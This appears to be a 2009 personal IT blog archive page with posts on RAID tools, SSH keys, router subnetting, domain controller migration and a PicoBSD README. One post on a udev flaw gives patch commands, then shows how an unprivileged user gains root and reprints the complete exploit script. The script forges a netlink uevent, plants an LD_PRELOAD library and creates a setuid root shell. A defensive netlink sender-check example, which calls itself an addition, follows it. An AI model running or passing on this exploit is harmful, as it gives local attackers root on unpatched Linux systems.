21 2009

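Install a UI management interface for your Adaptec controller!

Posted by admin in Microsoft, Diary, Computer Networking

Many servers today use RAID controllers built on Adaptec chips! The RAID is already configured at installation time, but once the server is in production we cannot shut it down and enter the RAID configuration screen just to check whether a disk has gone offline! So we need a tool that works while the system is online!

I happened to come across Adaptec Storage Manager while searching online: Adaptec's storage device management software!!! This software is really great!!

It supports almost every operating system, such as Windows, Linux and Unix: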
5.1 All
5.2 Windows – All
5.3 Windows 2000
5.4 Linux
5.5 SCO OpenServer
5.6 Open Unix and UnixWare
5.7 NetWare

21 2009

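PHP code for generating static HTML pages in WordPress

Posted by admin in Diary

For a high-traffic site, making pages static can greatly reduce the number of database connections and reads and lower CPU usage, which increases the load the site can handle and, to some extent, speeds up access for users. Even if the database crashes, the site remains accessible, and search engines also tend to favor static HTML pages. The static-page plugins currently available for WordPress generally have fairly serious flaws, for example in displaying related posts, updating when comments are posted, and updating the data in the sidebar. So is there a way to define for yourself how, or when, the static HTML pages are generated?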

20 2009

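Logging in to SSH with a certificate on Linux.

Posted by admin in Linux, Personal Case Summaries

1. Generate the SSH certificate (ssh-keygen): ssh-keygen -t rsa

2. Then transfer the private key and public key to your computer.

3. Use SecureCRT to log in to SSH with the certificate. Oddly, SecureCRT uses the public key for login authentication.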

20 2009

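Lilo & Stitch (Mandarin dub)

Posted by admin in Diary

Yesterday I saw this animated film on the CCTV movie channel and I really like it. I searched for it online and put it on my blog!

Film synopsis:
The main character of this film is Lilo (Daveigh Chase), a little girl living in Hawaii. Lilo is 7 years old, lively and cute; she loves dancing the Hawaiian hula and listening to old Elvis songs, and has always dreamed of having a pet dog of her own. One day, Lilo pays two dollars to adopt a pitiful stray dog, Stitch (Chris Sanders), but what she never expected is that this odd-looking blue animal is no ordinary dog at all: he is an alien creature with six legs! He is also a dangerous element produced by a failed experiment. While he was being exiled to another planet in the galaxy, the spacecraft crashed and had to make an emergency landing on Earth, and Stitch seized the chance to slip away.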

19 2009

Linux local privilege escalation vulnerability disclosed: update udev immediately

Posted by admin in Linux

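Another local privilege escalation vulnerability has been disclosed in the Linux udev program. A local user can easily gain root privileges, so update udev immediately. (Systems running 2.4 kernels are not affected.)
Fix (back up important data before applying it):
Debian users: run apt-get update ; apt-get upgrade -y
CentOS users: run yum update udev
RedHat users: update with the official rpm packages or purchase RedHat's Satellite service.
Demonstration of the attack:
1. Create a test account on the Linux system.
2. Download script a from
http://milw0rm.com/exploits/8478
3. Find the PID of udev. Method 1: first run cat /proc/net/netlink
ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2
ffff810037f81000 16  0      00000000 0        0        0000000000000000 2
ffff810077078400 18  0      00000000 0        0        0000000000000000 2
That 364 is the udev process. If many entries appear and you cannot tell which one it is, use method 2.
Method 2:
Alternatively, it is best to get the PID with ps aux | grep udev, which gives 365, then subtract 1 and pass that value to script a.
Then, in the test user's current directory,
run the following steps:
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh a 364
(In the author's testing, the 364 here can be replaced by any characters and it still succeeds.)
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
The UID is now 0: the test user has become root and can continue as follows.
sh-3.1# bash
[root@localhost ~]#
Look! The test user has turned into root!!
It is currently confirmed that this attack is quite effective against Debian and Ubuntu; its effect on RedHat remains to be confirmed.
For the latest developments, see
http://baoz.net/linux-udev-exploit/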

 

 

Privilege escalation script:

http://milw0rm.com/exploits/8478


#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include #include

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];

sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");

memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;

msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;

socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

char message[LONG_STRING];
char *mp;

mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);

char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);

sendmsg(socket_fd, &msg, 0);

close(socket_fd);

sleep(10);
execl("/tmp/suid", "suid", (void*)0);
}

_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include
#include
#include
#include

void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1

# milw0rm.com [2009-04-20]
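
The script above succeeds because the receiving daemon acts on a netlink message that an unprivileged local process sent directly to it (address.nl_groups = 0, sendmsg from a normal user). The following is an added example, not code from the original post or from the udev project: it shows the sender check a NETLINK_KOBJECT_UEVENT listener needs before trusting a message. The names uevent_sender_trusted, recv_trusted_uevent, struct peer_cred and CRED_CMSG_TYPE are assumptions made for illustration.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <linux/netlink.h>

/* Hypothetical local stand-in with struct ucred's layout (avoids _GNU_SOURCE). */
struct peer_cred { pid_t pid; uid_t uid; gid_t gid; };
#define CRED_CMSG_TYPE 0x02 /* numeric value of SCM_CREDENTIALS on Linux */

/* Accept a uevent only if the kernel sent it: netlink port id 0, a
 * multicast group set, and attached credentials with uid 0. */
int uevent_sender_trusted(const struct sockaddr_nl *from,
                          const struct peer_cred *cred)
{
    if (from == NULL || from->nl_family != AF_NETLINK) return 0;
    if (from->nl_pid != 0) return 0;    /* sent by a userspace process */
    if (from->nl_groups == 0) return 0; /* unicast, not a kernel broadcast */
    if (cred == NULL) return 0;         /* no credentials attached */
    return cred->uid == 0;
}

/* Read one message from fd (SO_PASSCRED must already be enabled on it).
 * Returns the payload length, or -1 on error or untrusted sender. */
ssize_t recv_trusted_uevent(int fd, char *buf, size_t len)
{
    struct sockaddr_nl from;
    struct peer_cred cred, *credp = NULL;
    union { struct cmsghdr align;
            char buf[CMSG_SPACE(sizeof(struct peer_cred))]; } ctrl;
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *c;
    ssize_t n;
    memset(&from, 0, sizeof(from));
    memset(&msg, 0, sizeof(msg));
    iov.iov_base = buf;          iov.iov_len = len;
    msg.msg_name = &from;        msg.msg_namelen = sizeof(from);
    msg.msg_iov = &iov;          msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;  msg.msg_controllen = sizeof(ctrl.buf);
    if ((n = recvmsg(fd, &msg, 0)) < 0) return -1;
    c = CMSG_FIRSTHDR(&msg);
    if (c && c->cmsg_level == SOL_SOCKET && c->cmsg_type == CRED_CMSG_TYPE &&
        c->cmsg_len >= CMSG_LEN(sizeof(cred))) {
        memcpy(&cred, CMSG_DATA(c), sizeof(cred));
        credp = &cred;
    }
    return uevent_sender_trusted(&from, credp) ? n : -1;
}
```

Enable SO_PASSCRED on the socket with setsockopt before the first call; without it no credentials are attached and every message is rejected.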

19 2009

Migrating domain controllers from 2003 to 2008

Posted by admin in Microsoft, Personal Case Summaries

To join 2008 to 2003, you must first practice the Yi Jin Jing!!

18 2009

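A few questions about the H3C MSR20-21

Yesterday I went to adjust the network of the population center!
The IP range assigned by the higher-level department is 23.246.5.0/24, with gateway 23.246.5.254.

Because there are two internal departments that need IP isolation, I subnetted the range internally.

1. Carve out a directly connected segment: 23.246.5.252/30
2. Carve out a segment of 128 addresses: 23.246.5.0/25
3. Carve out a small segment of 32 addresses: 23.246.5.128/27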

16 2009

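Network adjustment plan for a city's population center

Posted by admin in CISCO, Personal Case Summaries

I. Overview

The center is the population information management center of a certain city. It frequently needs to synchronize data with the population offices of the districts and counties, and also needs to exchange information with municipal and other related departments.

II. Current network status

The center uses two H3C MSR20-31 routers as egress devices performing NAT. When the network was previously designed, the customer did not give the design and construction staff a complete briefing, so the network currently only allows access in one direction: offices outside the center cannot reach the servers inside the center.

The network being adjusted this time is the Party and government network. The higher-level department assigned the center a class C range: 23.246.5.0/24, with gateway 23.246.5.254.

III. Remediation goals

1. The entire Party and government network must be one large internal network in which IP devices anywhere can reach each other.

2. Internally, VLANs are needed to divide the layout by office.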

 

16 2009

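Transferring a Windows Server 2003 domain controller

Posted by admin in Microsoft, Personal Case Summaries

After I got home from work today, I suddenly got a call from my boss saying that a customer wants to migrate their 2003 DC to 2008.

To give the customer an accurate answer, I immediately fired up the modem, went online, and started downloading the latest 2008 to run a test. But this damned ADSL is as slow as.......

So I could only use two virtual machines running 2003 Enterprise Edition to simulate the customer's DCs, and one XP machine to simulate a client at the customer's site.

                 DC ---- DC(NEW)

                  |

               XP

DC: 1.1.1.1

DC(NEW): 1.1.1.2

XP1: 1.1.1.10

    First I installed the domain controller on DC and created two users, one named computer and one named xp. computer was added to the Enterprise Admins group and is used to perform domain join and leave operations. The xp user is used to log in on the client....

    Everything normal so far.... DC installed successfully, and XP logged in to the domain without trouble.

    Then I started adding the other DC (new) to the existing domain as an additional domain controller. It reported that the RPC service was unavailable.. I checked the related services and, damn it, the RPC service was fine! Could DNS be wrong? Pinging ghitr.org resolved correctly to the DC's IP!!! Then it occurred to me to look at the protocols on the network adapter, and what I saw annoyed me! During installation I had cut a corner and only ticked the TCP/IP protocol. Of course that meant the NetBIOS protocol could not be resolved.... I added the protocol and installed the additional domain controller. Still an error!!! Out of time, so I first joined it to the domain as an ordinary member and then installed the additional domain controller. This time it worked!

Step 2: (netdom is a very interesting command, e.g. netdom query fsmo)

    Start migrating the domain controller. (Performed on the primary DC.)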

13 2009

how to make dialup flavor(Picobsd)

Posted by admin in Diary

PicoBSD @VER@ (DIALUP flavor)
-----------------------------

What is PicoBSD?
----------------

It’s a one floppy version of FreeBSD (please see http://www.freebsd.org),
configured mainly for dialup access. It can be used as a means to read your
mail remotely, or to log in somewhere and do the work there.

What are minimal requirements?
------------------------------

* 386SX CPU or better (this release contains also FPU emulator)
* 8MB RAM – the more the better.
* Modem sitting on COM1-COM4 (default is to use COM2), if you want to have
a PPP connection.
* Network card: compatible with NE2000, or PCI cards with DEC chipsets
or 3C509 series (ed, ep and de drivers). There is also driver for Intel
EtherExpress PCI card (fxp), and Lance/PCnet (lnc).

How to make a dialup connection?
--------------------------------

I recommend running /stand/dialup script, which will additionally configure
the PPP to allow you to automatically connect to your provider, and
will make the ppp to run in background. However, if you like to do it
yourself, or the script doesn’t work properly in your case (let me know
this!), here are the steps you should take:

1. Go to /etc/ppp directory and edit file ppp.conf (using ee editor). You
should check at least the port number of your modem (it’s configured
on cuaa1==COM2 by default).
2. After you’re happy with it, start ‘ppp’ program. Enter the terminal
mode (‘term’) – you are now directly connected to your modem, so you
can normally dial the number using AT commands (e.g. atdt555666777),
and log in to communication server. You should see something like
this:

(comm server prompt) login: abial
(comm server prompt) Password: ********

Then either the comm server automatically switches to PPP, or you
should issue a command to tell it to do so (e.g. ‘go ppp’, ‘PPP’ or
other). When PPP is started, you should see something like:

ppp on pico> Packet mode
PPP on pico>

Notice the uppercase PPP – it means that the protocol is up, and now
you’re connected. Congratulations. :-)
3. Your console is blocked now, but you can use other virtual consoles
available under Alt-Fn.

How to configure my Ethernet card?
----------------------------------

Hopefully your ethernet card is supported by PicoBSD kernel, and in case of
ISA cards you have already set up correctly its parameters in UserConfig
editor. You can check if PicoBSD found your card by looking into startup
messages (‘dmesg | more’).

The easiest way to do it is to edit /etc/rc.conf file (‘ee /etc/rc.conf’).
Find the line which says ‘network_interfaces’ and add the name of your
card to the list. Then add yet another line ‘ifconfig_‘ which
actually sets up your IP address and netmask. E.g:

network_interfaces="lo0 ed0"
ifconfig_lo0="inet 127.0.0.1"
ifconfig_ed0="inet 192.168.0.1 netmask 255.255.255.0"

Then you have to set up your default gateway, which is usually the router
nearest to you (on the same LAN). E.g:

defaultrouter="192.168.0.100"

Then you save this information on the floppy with ‘update’ command, and
reboot.

Of course, you can also issue the proper commands by hand:

ifconfig ed0 inet 192.168.0.1 netmask 255.255.255.0
route add default 192.168.0.100

Once you do this, you should be able to ‘ping’ some remote IP address.

Where to get additional info?
-----------------------------

There is official page of this project at:

http://www.freebsd.org/~picobsd/

You can find some information there – not too much yet, to be sure… ;-)
I’ll put there also new versions of PicoBSD and bugfixes.

I’ll be glad hearing from you about your experiences with PicoBSD. Thanks.

Have fun!

Andrzej Bialecki

$FreeBSD: src/release/picobsd/dial/lang/README.en,v 1.7 1999/08/28 01:33:19 peter Exp $
